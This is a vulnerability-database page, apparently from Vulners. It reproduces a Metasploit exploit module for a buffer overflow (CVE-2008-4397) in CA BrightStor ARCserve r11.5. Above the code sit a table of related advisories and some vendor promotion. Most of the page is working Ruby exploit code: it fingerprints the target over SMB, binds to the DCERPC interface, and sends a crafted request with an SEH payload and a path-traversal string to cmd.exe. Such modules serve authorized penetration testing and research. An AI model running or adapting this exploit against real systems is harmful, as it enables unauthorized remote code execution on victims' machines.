Lucene search
K

Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow

🗓️ 04 Dec 2009 02:55:00Reported by Nahuel Cayento Riva, MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

Computer Associates ARCserve Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
CA BrightStor ARCserve Backup RPC Interface (asdbapi.dll) Traversal Arbitrary Command Execution
14 Oct 200800:00
nessus
canvas
Immunity Canvas: BRIGHTSTOR_CMDEXEC
14 Oct 200821:10
canvas
Circl
CVE-2008-4397
30 Apr 201000:00
circl
CVE
CVE-2008-4397
14 Oct 200820:00
cve
Cvelist
CVE-2008-4397
14 Oct 200820:00
cvelist
Exploit DB
Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow (Metasploit)
30 Apr 201000:00
exploitdb
exploitpack
CA-ArcServe
12 Jun 200800:00
exploitpack
NVD
CVE-2008-4397
14 Oct 200821:10
nvd
Packet Storm
cabrightstor-exec.txt
11 Oct 200800:00
packetstorm
Packet Storm
Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
31 Dec 200900:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).
        By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer
        and execute arbitrary code. In order to successfully exploit this vulnerability, you will need
        set the hostname argument (HNAME).
      },
      'Author'         => [ 'Nahuel Cayento Riva', 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '31684' ],
          [ 'OSVDB', '49468' ],
          [ 'CVE', '2008-4397' ],
          [ 'URL', 'http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 550,
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [ 'Computer Associates BrightStor ARCserve r11.5 (build 3884)', { 'Ret' => 0x2123bdf4 } ], # ASCORE.dll 11.5.3884.0
        ],
      'DisclosureDate' => '2008-10-09',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('HNAME', [ true,  'The NetBios hostname of the target.']),
        Opt::RPORT(6504)
      ])
  end

  def fingerprint

    datastore['RPORT'] = 445
    os = smb_fingerprint()
    return os

  end

  def exploit

    path = fingerprint()

    if (path['os'] !~ /Windows/)
      print_error("Target not supported!")
      return
    elsif (path['os'] =~ /Windows 2000/)
      dir = "winnt"
      offset = 442
    else
      dir = "windows"
      offset = 436
    end

    print_status("Identified OS '#{path['os']}', setting appropiate system path...")

    datastore['RPORT'] = 6504

    connect()

    handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")

    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    buffer = rand_text_alpha_upper(offset) + generate_seh_payload(target.ret)

    sploit =  NDR.string("#{datastore['HNAME'].upcase}")
    sploit << NDR.string("..\\..\\..\\..\\..\\..\\..\\..\\..\\#{dir}\\system32\\cmd /c \"""\"""")
    sploit << NDR.string(buffer)
    sploit << NDR.string(rand_text_alpha_upper(20))
    sploit << NDR.long(2)
    sploit << NDR.long(2)
    sploit << NDR.string(rand_text_alpha_upper(20))
    sploit << NDR.long(0)
    sploit << NDR.long(4)

    print_status("Trying target #{target.name}...")

      begin
        dcerpc_call(342, sploit)
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      end

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation